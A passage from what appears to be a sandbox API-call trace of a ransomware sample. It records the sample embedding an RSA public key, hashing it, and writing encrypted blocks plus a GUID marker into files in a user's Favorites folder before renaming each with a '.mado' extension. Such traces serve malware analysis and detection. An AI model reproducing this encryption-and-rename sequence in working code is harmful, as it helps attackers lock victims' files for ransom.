KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.331] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.331] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.331] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.331] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.331] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.331] GetLastError () returned 0x0 [0205.332] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.332] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.332] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.332] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.332] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.332] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe7a8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe790 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6edb0 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eec8 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7a8 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.333] GetCurrentThreadId () returned 0x600 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68cd8 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.333] GetCurrentThreadId () returned 0x600 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7d8 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7a8 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7f0 [0205.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7c0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe808 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe7d8 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6edb0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe808 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eb80 [0205.335] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.336] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.336] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.336] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.336] CloseHandle (hObject=0x63c) returned 1 [0205.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b66078 [0205.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.337] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.mado")) returned 1 [0205.338] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0205.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0205.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.339] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=134) returned 1 [0205.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.341] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.341] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.342] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x86, lpOverlapped=0x0) returned 1 [0205.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.342] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.343] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.343] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.343] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.343] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.343] GetLastError () returned 0x0 [0205.343] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.343] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.343] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.343] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.343] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.343] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.344] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.344] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.344] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.344] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.344] CloseHandle (hObject=0x63c) returned 1 [0205.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.345] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.mado")) returned 1 [0205.346] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0205.346] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.346] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.346] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 